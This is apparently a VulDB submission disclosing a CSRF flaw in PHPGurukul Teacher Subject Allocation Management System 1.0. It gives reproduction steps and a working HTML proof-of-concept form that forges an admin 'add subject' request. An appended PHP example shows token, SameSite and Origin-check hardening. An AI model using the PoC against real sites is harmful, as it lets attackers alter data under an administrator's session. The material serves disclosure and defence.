Submission #248683: PHPGurukul Teacher Subject Allocation Management System 1.0 Cross Site Request Forgery (Info)

Title: PHPGurukul Teacher Subject Allocation Management System 1.0 Cross Site Request Forgery
Description:
Hello there, my name is Dhabaleshwar Das, a cyber security researcher. I recently found a Cross Site Request Forgery (CSRF) vulnerability in Teacher Subject Allocation Management System V 1.0. Here is the PoC below:

Bug Description: A Cross Site Request Forgery (CSRF) vulnerability in the "/admin/subject.php" endpoint of PHPGurukul Teacher Subject Allocation Management System 1.0 allows attackers to "Create a new Subject" via a crafted HTML request.

Steps to Reproduce:

# Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Teacher Subject Allocation Management System
# Date: 07-12-2023
# Exploit Author: dhabaleshwardas
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/
# Version: 1.0
# Tested on: firefox/chrome/brave
# CVE :

To reproduce the attack:

1- Head to the http://localhost/tsas/admin/subject.php endpoint after logging into the admin account.

2- Here you can see that there is only one course added, but now we will add another course using the HTML code we have written.

    <html>
    <!-- CSRF PoC For Add Subject- by Dhabaleshwar Das -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/tsas/admin/subject.php" method="POST">
      <input type="hidden" name="cid" value="1807" />
      <input type="hidden" name="sfname" value="Maths" />
      <input type="hidden" name="ssname" value="MATH" />
      <input type="hidden" name="subcode" value="MA01" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

3- We'll then execute this HTML code and see that the record has been added successfully.

4- This shows that the endpoint "/admin/subject.php" is vulnerable to a CSRF attack.

5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.
Source: https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/csrf_add_sub.md
User: dhabaleshwar (UID 58737)
Submitted: 2023-12-07 08:10 AM (2 years ago)
Moderation: 2023-12-09 06:29 PM (2 days later)
Status: Accepted
VulDB Entry: 247346 [PHPGurukul Teacher Subject Allocation Management System 1.0 Create a new Subject /admin/subject.php cid Cross Site Request Forgery]
Points: 20
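The report above works because the subject.php handler accepts any POST that carries the expected field names, so a page on another origin can submit them with the admin's session cookie attached. The following is an added example, not PHPGurukul's code, of how such a handler is hardened with a synchronizer token: the field names (cid, sfname, ssname, subcode, submit) are taken from the PoC, while the session layout, the host check and the insert_subject() stub are assumptions made for illustration.

```php
<?php
// Added example, not PHPGurukul's code: a synchronizer-token CSRF guard around a
// form handler shaped like the /admin/subject.php POST in the report above.
// Field names (cid, sfname, ssname, subcode, submit) come from the PoC; the
// session layout and insert_subject() are assumptions for illustration.
declare(strict_types=1);

// Second layer: SameSite=Lax stops the browser attaching the admin session cookie
// to a top-level cross-site POST at all (supported from PHP 7.3).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One unpredictable token per session, stored server-side and echoed into the form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A third-party page cannot read the admin's token (same-origin policy), so a
// forged POST like the PoC arrives without it and is rejected here.
// hash_equals() keeps the comparison constant-time.
function csrf_token_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// Defence in depth: browsers send the foreign page's Origin on a cross-site POST,
// so additionally require the request to originate from this host.
function origin_allowed(array $server): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $originHost = is_string($origin) ? parse_url($origin, PHP_URL_HOST) : null;
    $ownHost = explode(':', (string) ($server['HTTP_HOST'] ?? ''))[0];
    return is_string($originHost) && $ownHost !== '' && strcasecmp($originHost, $ownHost) === 0;
}

// Placeholder for the application's real database insert (assumed, not vendor code).
function insert_subject(int $cid, string $fullName, string $shortName, string $code): void
{
    // Use a prepared statement here, e.g. PDO: INSERT INTO subjects (...) VALUES (?, ?, ?, ?)
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    $token = $_POST['csrf_token'] ?? null;
    if (!origin_allowed($_SERVER) || !csrf_token_valid(is_string($token) ? $token : null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    insert_subject(
        (int) ($_POST['cid'] ?? 0),
        (string) ($_POST['sfname'] ?? ''),
        (string) ($_POST['ssname'] ?? ''),
        (string) ($_POST['subcode'] ?? '')
    );
    echo 'Subject added.';
}
?>
<!-- Legitimate form: the hidden token is exactly what a cross-site PoC cannot supply -->
<form action="subject.php" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="number" name="cid" placeholder="Course ID">
  <input type="text" name="sfname" placeholder="Subject full name">
  <input type="text" name="ssname" placeholder="Subject short name">
  <input type="text" name="subcode" placeholder="Subject code">
  <input type="submit" name="submit" value="Add">
</form>
```

With this in place the PoC's request fails twice over: the SameSite attribute keeps the session cookie off the cross-site POST, and even if a browser still sent it, the handler refuses the request because no valid csrf_token field is present. The token check is the authoritative control; the Origin/Referer comparison and the cookie flag only reduce the blast radius if it is ever misconfigured.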
